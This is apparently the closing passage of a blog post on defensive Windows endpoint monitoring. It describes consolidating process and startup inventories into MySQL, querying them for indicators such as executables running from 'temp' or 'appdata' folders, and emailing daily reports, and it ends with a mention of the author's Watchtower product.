<img alt="" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABDIAAAAYCAIAAACHs0o0AAAWk0lEQVR4nO1dyXbiPBYmAwnY4HmeJHkEEgJJpf517/MkeYve8CA8R16gl73oB+qFJFsG29gJVUml9B2dOiksX11dTfezptH//vuf//33P//+97//9a9/jTg4ODg4ODg4ODg4OH4/OC3h4ODg4ODg4ODg4PhkcFrCwcHBwcHBwcHBwfHJ4LSEg+CiFaOLT0z84mLEhIMnHxN8GgMTGK5Pc5Qeckaji9FvKBcODg4ODg4Ojt8ETkv+arAe8mUrLi6H+urD029P/fKCCQdP2lXqIbcHTsu/aIreN/5l3bBljEZ6dEjLLi9+XblwcHBwcHBwcPxucFryjdHk89b9X4yrvmh3pd8LVoHrRtQ1OHpWqnSYcSq4ij1mA0FzmofyD53+ZvlD9aF5KzlKs7mpAh2FdcZy+R31koODg4ODg4PjGJyWfGOc5hnYXR+PxzcHGB/9WDrxLYyFCU3pXNXeYxzxmga3B6Bp3zDKMM+wSlgedqovSg5wdYUFkzcmt5NWHKbKJnB9fV2JZ9jU1YH8ofpUb1C7jo9RI2aUXB2WTHe59AYpkc+usxwcHBwcHBx/Kzgt+cYgXisOB2Bc/MlkMp1OpwLGdDqdTqcT8iMD7L/XeUuT5PF4fMOSiMoLJ29XjnjppuPUsAIihiCy+kyPnouCIEynk9vbm/F4zDCBi0vCAcY3N7eTyWQqCKIozjDmZSCYzWez2awUKTIQhCmVj5lJJf/q6up6PL65vSVa9dXnBusjMDlgWVEjXTqgY6RghGlpnZZyuWkq9GP+ybw1Hl9fX392neXg4ODg4OD4W8FpyTcGdlxxmB4FQRAEkbjs8/lcIiDuOnHjMSTyE3alG1FjMIQ/CKIoijNxRgNx3RlXnNIRUWR0kCkkWZIkiaSOH8uyrBDIsjSfzwRhOpnclkygxkmmU3E2m0uSrCiKqqpaGTRN0zRd13RN0zRVVbE4WZaVQ/GiIEwnDDNhOMlkKoiz+RyrJA/Sh+ZPkuaVUUWxok+zkixVFhZpBGIoWZJkXF5d5dIA8Sjg4ptMJpPJZ9dZDg4ODg4Ojr8VnJZ8G6xe9/vXFfsL8X4VWZYlNkg0YCdfVVVN03Rd13VdYxz18pHG/CpT/11RFEVVFOzSK5RFyBJOo4ygqoqmqZqmapqiqrIiSxIlOCKZx5jPJUmWFUWlqekVNB2/jFXUdMMwTNO0LNMyDUNXVUWS5qKImQBZyHR9fT2+uZlMp+JsLsmKqun4Fcu2bQcHx3Ycx3Ud13Ecx7YtyzJN0zAMwzQNk8DQdU1VZGk+E4TJ7e14PL6+uiYrsQgnkSRF1TT6mt5XH003MHRNU1UF8xPCx5SSFhGiJFeFSOxJC8vQdQOXWGO5qLRoSKDFcQBcgrIsS5h59qlXHBwcHBwcXx98/PrzcEBLVq/7t7e3t7e38xXky+7t7W3/+svinwEvu2H5fdm9ldi9dMk5qz27LfOyq+kyGo1GhmmaVhmw82yYpmEwofTYbcd2HJv10SkFwI9ty7IsKs2yLduxHddxXMd2bMu2TMusEiBCLdu2bMdyHNt1bMexbNu0TF1nfHHKizRd10l6poUVwizCsrFwy7Qty7Ft13U9z/N9z/cc1zEtU9NUSZoJwhSvnsLr024nE0GcSbKi6YZl267n+YEfhAENYRiVCMMg8H3f8zzPdb0KrmNbpqGrijSfidNS/M345vZ2KgizuaSommFatuO6nud6ffXBb7iuixkR5j8aQ8eMY5gGYUul5TGrwjLstnIhRi9L13HJW67r4DiO49iOTdXQVVXtU68+jtd9c5vobi9D2+knYXAP9sXzRfLTpOAvGC8+hK9Zr/qPF23oYedPGDeH4lPr+Wn7dNTzX5Tix+J/TXw1Ox+PX9+tf8You4g+Wfvq42zjbMm5+eXLblhj6xX/dX9+b6kXVq/7gX3Huez5um+tc41JeL7vB74f+EHoB4EfBJ6Pg+95PnW/fc/3fT8g8H3f84jP7DiOQ1gAkUOkBUEYRREAAEGIIIAgiqIgDP0g8ALf830vwJGCMAyiKIhACEAAoiAKPN9zXNuy8FQBccVL+mPbtk08bs9zfd8jwXOxwoEfRGEIQARBBEEQBq7nmJahqgpePVWuDJsK4lySVE03bdv1/TCKAIQQ4YBQjFASx0mSJEmcxHGMIIQAgCiKIgAiAAAAURQGvuc4lqGrsjwXxekULzybkMVbsqLqpmW7nh+GIQARiHrpY9mu5wdhGEZhGAa+77kuma6xLItQObukEYR8uB61gI9LMwixhCgMwyAIgqZyQQBBACHJEYQQIYRQHKM4RiiGCFuD5DsMAt91Xdu2T9arc7W7jjZxlvbyaf1DZzs9h/Bz2X+AnO4C+VLl9eXq1fDxolNSh/5Dx9kaPrG9DMIH9Dxtn/M6PkP7gV/ab/xGfCE7NzaZ72LnCi+7Kkf9e7mvO4/Un5aUZKz2xYf5EFR7peJub7uXHt1lW/xG+UzkQ4Xa9DmVLBsZ/7jb7TrF14hpN/tssCebhd4t5HX/1vLluuGT9svuDSAIY+yFoziGcQwRDghABAAEBBBA7LVDWDqpBKWnCyGJg1CcxEmWZkVeLIpiUeRFnmVZkuI0EEQIIoTTjROUJChJUZqiNIEJAhAEYeD5ruPYlmVaVslGsBfuOA6ZDwn8MAyjKAQR8b9BFEEAEEJJHKdJnMQQgSD0Hdc2DE2WpdmM7FwRBHE2J7TB8fwgAjCO4yRJUhzSNEvTPMuKPC+KvMizPEvTNEmSuAoxiiEAoe+7tmVoqizNZ6JIts2Is5kky5puWI7jBWEEIYxjFCPQV58IQAQRghBiU3senjyhMxl48sXzfd/3wzCIopBQCxIgggiTKxwQxL8w5bLAIS8KEhaLxXK5XC1XJCyWy2KxKIpFnudZmiVxjACIgjDoqlfvanfVO/s965/hNlFr90w6/WcdG+R36NmOKgf7Vzb9Y/llzP3riv1PTaV+vtOw/qczX839c3eqvcvxdb9/fWE+xx11Zh/q375vvRo8XnTardvOB+Nsm30a0JGvFn3wr/vXFX2+e8F/7fc7qgsraeg4O3jcb7PbQD+kuZ6vyuzW/tctajSkHxgcv72etJV7c//WZGcy5fi6O3ryx9m5ear/g/0zlVxac8e2heb63NI/N7Sjg4T7WeBA53fTksHtdHg9pKbr1LEnLXndM2JedpUGLy+siam+7CxQnymz9vjN8vF/m2pWe/wOtBRP1aUeMq4h1Lzxd/aH1eu+Z81rm1w7lv+ye3vbvSQp9r+znIQ0z9MsT7M8TbMkSZM4iWM6b5CkSZIkcYwQgoCQgSgCACKEqFufZmmWZ3lRLFaru/v7+/V6/bC+v79f3a0Wy0VeFFmep1mWZlmaZzihPE+LIi2KtMiTPIvTGCIQRoHve65HVxK5DgPXdT3fC8IgAhGEAJEAEYQx8bzTPEuzNE5QBELPdy2ydEqi+/QlsnzLcb0gAiiOsR2YkBdFsVgslkvsnmPNmZClaYIQCEMfT5gosoT3/M9mM0kiy7cczwuiCMZxnKZJmqBe+oQAojhJkjSNkxghzEzoKrJy+srzydwHAADPcZCSiuMkxvwqzVI2ZHmWL2i5PKzXDw/rh4f79fpuvb5br+8fHh42m+12+/i4fXzcbh83m+36YXO/Xt/d3a+Wq0VR5GmaQIRO1udB7Y6VwH7RGdXcx0OB/dtRp/wBHgFuL6VMdmhslF/T5GjsGzoJPqj/acxXa//cjkHlWFsctTrsWc/Sv33LelXKan8ywG5H8VvHzQ7929BSr9r1od4F/nv3wtRa2pxWdaED6vnAcb9Fz6F+SHs9f9mdbIPHeMfi8J7x28qlrdzb+rfO9s6+QP7+s+zc1t4/3j9XGtes2Vqfu/rn43b0Tv+QMqXeNGZQf9iSr2H1kNHz47RkdVg9qspT/4BBYtXr1ulZ7I74jfJHo1FblW2P34HGYmC/2J2Zlhx99Rn2UeUQTasn96+j0SjN83xRFMtiUQ/FIiezBJVfi5GmaVIuagKUkyRpmmbYm8+LxWK5Wt3d3683m812u9luN5uH9Xp9d3e3xF/gF/gLfY65UFFkxSJbLLJFkRZ5kqUoQQBGYRSQ1WQe3WjhlLMmnodpCUAIxmTihay8ShOWlgAY+b5n25au6wrZsCLLZJu7jadKUJykWZbleVZkWZ6lOZ0qobSETBwsFnkZijzL0jiGUei7jmUamqrI5FQwSVIURdPp8jAACC3Jkp76wDhJ0izNsgSbGgC6vcWvLawLgjCM8FRMnKZJliYsCaHFQUNxUC7bx8ft43az3T5st5vt4/bx6enHjx8/n5//ef75z/Pzz6cfz4+PT5vt48PDZn2/vluulnmRJ2naWa9Go8Htrm1dPf2a0tSU+neXnfL7t6mOz3sd+wIahur3YVD/05Cvjv65HYPK8cA1POFuvqt/+471qpLe/mSA3Q7jdw1Mrfq3obledehzXMlKBWjj6ENLmuv5oHG/Tc+hfkhnPa/+7NO6fim6yqWx3Nv7t0Ht/Q+z89l2RXZ/mGafNtfn7v65sR119gPdGLRjrT8tac7XsHrYGx+jJTULVLHORkta5I9Go+bhoSt+B343LfnYIuAeiZa0BE8LdNCS7JiWJEmMECTAS4MwK8nr7u/Dw2az2Ww3Dw8P6/X93Wq1pDMPmJOUsyV5npCQxWmCEgQgiKIwCH1KSxyHbqg3TcuyHNf1fT+MIggpM4EwhhUzSZM4jVEMIxB6vmfbtmEYmqaRI6hUTddNy3Zcn85NZBnhYGmSpHFCuQ1e3USpSI2WpBmZLXEdyzR0jRxXRQ4u0w2ykz6IIoAgnsqACEZRP30oLUExqlgJMQVex+V6nu8HYQgARDFKkiRNkzQl8yTVtBWhJWTupyyX7XbzuMWkkdCSp6en5+fnnz9//vPz5z/PP3/++PH8+PS0ZWlJsSjSLO2sV6PRR9pd/SvR6x7PCzfEHeI+dsg/Cy1plU+yeY6x78vQktZy7B4QztK/fcd6VUlvfzLAbkNoSU3qe2dLOvX5hbRk+LjfkvHh7nJ7PafSvsAmnKH9VVv8oe39T7LziUb9EVEHGWSyfx5a8lH/sO/rH6Ul7xo3e6H3Ii72B6rN0bRGxXMPlgefXsTVFL9Vfl2lcoayM34HfjstGTyN2I5mtwjLR0mSkBU+hyHNUrJqi13EVXGSctsJ3bSQJmmKReVFUSyWy9Xd3d39/d393d3darlcLooiz3PCbNIkSeM4QXGC4gTGCUxwiGGMAAQRCMMw8APsiNu2bVmmYRjlQVSWZbuuFwQB3oMOQQSjCERkf0W5zx7gjdqOZVm6oeMjjMnxufi8Ky8IIwARiunWdpI1vD0jxgwnTbIsybKSQqV5nmZpHCOyt8Q2DV0rT0xWKp5h2o7jBX4YhREEmGn5vfSJ8Q4WFCMIQYR3vnvMqVp477vtuHh3PCCzRuVmkjimJVKbPKmVy/16fb9e392v7+7X9+uH9WazeXx8fHp6+vH09OPx6Wn7+Piw2a7XD3gR17JYFFmeJWnSXa9GA9tdreLXRZJHLw0eZP92dFr+6DiJl93RJ5x6e6xe6JCP+4WzjH0DaUlDvpr7504MLEemD1+dXsT1jv7tz69XLRgyXnTbrYHGtIyznfW2GY356tLn19GSoeN+q55D/ZAT9fx1j/dNfKzBN3Q/75HR8s2oudyb+7ee7Z1hCH+Onc82VTI61T+wC7Ta+u2u/rkpp0P7T9aCPbul0RloyeB6SPU7VUPqtORwh17bbssyFebn/W7HLEiszeHsTi83bInfKr/2SvVbV/wTqVaiSiHkaygWRxh8o3na7NZuz0NR72xCHZ8EXvdvYRRFEECyJboKZHd7yT0AABBve4fkFCp8wBM9SpfseCevo5hZ1pVhJpIwXj+WAaIoCsMoCCM/jPwo8qMoiMIgDP0w8APf8/HKLYueTVt6/qqq6bphWTaeM6HHTFUhDAIqAm+cJ5d3qOS2DizANG3b8TyfbtnH+oR+EHi+j88LxtvoIYAQIARQDGMa8JYP33PwVImmspeIkAkTXTdN03Zs13M9crJZT31ABMgBWAHZ8O7YNj2Wmd4do+uGaVIjhEEQkaO3oui4RCBCEMVsudDFXTleULdYLJdLQlfu7/FuoLvlcrVYLPK8yDBHRTGCEOLq1PWpaUi7a6vk5driUljpSw5qR12NqElP5sFhi2NF1Ybn9kZ6NJ4OxeD+pzVf7YteeiR+ohzxanH837ouZ+3f/vh61YCB40Vb0u3xW8bN9wwuLfnqo89hrX2pbwJ+GVzPh477rVke4oe013M2xkedXWqbj0lpyW9HuTf2b+3ti7VDTd0/ws5nmirp5Q/v9/uDStvQbzf3z03tiGJgE2ZEnf4mNaw/7B6PhtbDl12P7PDrFP9knCDVtuu4nstso65CdUAw2c2Azwn2mXVVzLFY1UNymDA+oJZe/BGyu7ZdvFmE7GS3bQdfXYKDTe/JsCzTtIgXrqqKIpf3y5e7Nwy8oMu2Hdu2bcu2ymDblmVjN17XyvVV+CpHmVzMqOmGYVq27WATuB6lQbZpMfd7uOVJxEHgB/QoZR+flmsZhk63lcxL4BvWFUVRNVXXdcM0yM0wpqH304eQGNd1CB8xDB1fraiQ/SjkfkkNv2WRc5PxxSOuy5zaHNBADggmPBKfcgwiACI6N4RXgpEJFjydhY83gFEEwpDuvO9Trzg4ODj+OpxjV0lt9/NXxfkWQL0LZ5gq+X36n3G12F+AfkXDack3hqZruqEbVSjv5ju+sI8BuYK8utrPbIJVoXxLN5j72TU8Z6CpqqZoGrnrnfysqfTSeBlf+y6KgiBMBWEqCIJIDq9SqhvmyUXvTCBvS/iErJk4E0V8UNYMUwfq1lfXE5ZzGCRoKraPTq5pJ+cVmxZDeGR8Apd4DJyQJEuyIitHd6Wf0Mc0cREQldiciKIoCqIgiCIxA7GDrlWmZQrFaiwXmwW5fJFQGcphGPpJWZ9lmqb52XWWg4OD42vhYxt4GXx4gvU3gJkIONsO2J44m51/PT7RSt8fnJZ8Y8zm87k0l6rQCvkA7U9kWZJl6fgXSapNKczn8/l8NiOH6oqzmTibz+bzGftwhr1wQZhOJ5PJbYnJdDoVqONfRifS6L/kVWE6nU6n0wnBlNwtIlDigKc2iH7z+aE+c2IXkiVFVhSZcCVpPp+Joigw0g9QpiTORBHziT761Gw8p1wEvzphDDGZTNg3mbkaRohSL4XqV0XGeSG7YegmF13XKXekpLHaNiPLsvzZdZaDg4ODg4PjbwWnJd8Yt5PJZDqZTol33AWhjilxr4WDB4cvTZmfJi3u+y0NjENfPby9vb25ubkZj8fX4+vr6+vr8Xh8c3OD3XLi2E+ORN9Wb97c3IxvxgTkh9Ktr6NJn9I6Qi2vU0qViHJNYNIi6KXPoS1LKlKmRMxwYIlafg7Kq14whw8JuRHFGcvrCJUSxVrEz66zHBwcHBwcHH8rOC35xrgeX7d41G0+9k3pWFeh+nEorg8wPtYHP7i6urq6usS4urq6uqocczZqGRhcHYJJ7ZRKxzag4Vi7ZhzmsJc+xxatvXx5yViiPTcDCoZwozqFYmgUi8+usxwcHBwcHBx/Kzgt+cag7u1lh2N9DlxeXV5W3nQP1Lzvy8vLy8uLywuCy4uL7qjDwGjZHqXJQB9JtJc+TelcHODk2+9BF8+6+uw6y8HBwcHBwfGX4v8i40xTKBe27gAAAABJRU5ErkJggg==" /><br />
<br />
<br />
Again, in my above case, I've ignored three lines because I'm consolidating multiple queries using a simple type command resulting in the first three lines being garbage.<br />
<br />
Once all the data is consolidated, running a query inside MySQL for key indicators like 'temp' or 'appdata' becomes simple and fast. In addition, an inventory of system executables like csrss.exe or explorer.exe can report any executable not running in standard Windows Directories.<br />
<br />
Building a front end on the system allows for access, queries and reporting based on standardized queries on a daily basis. Build a python based email reporting system and your system is now alerting you to suspicious executables on a daily basis.<br />
<br />
In my Watchtower product I have taken this to extremes building transport, consolidation, reporting and front end systems with email reports daily to account for inventories of processes, startup tasks and services captured from multiple endpoints on a daily basis.Fort Knox Networkshttp://www.blogger.com/profile/12394479781465013402noreply@blogger.com0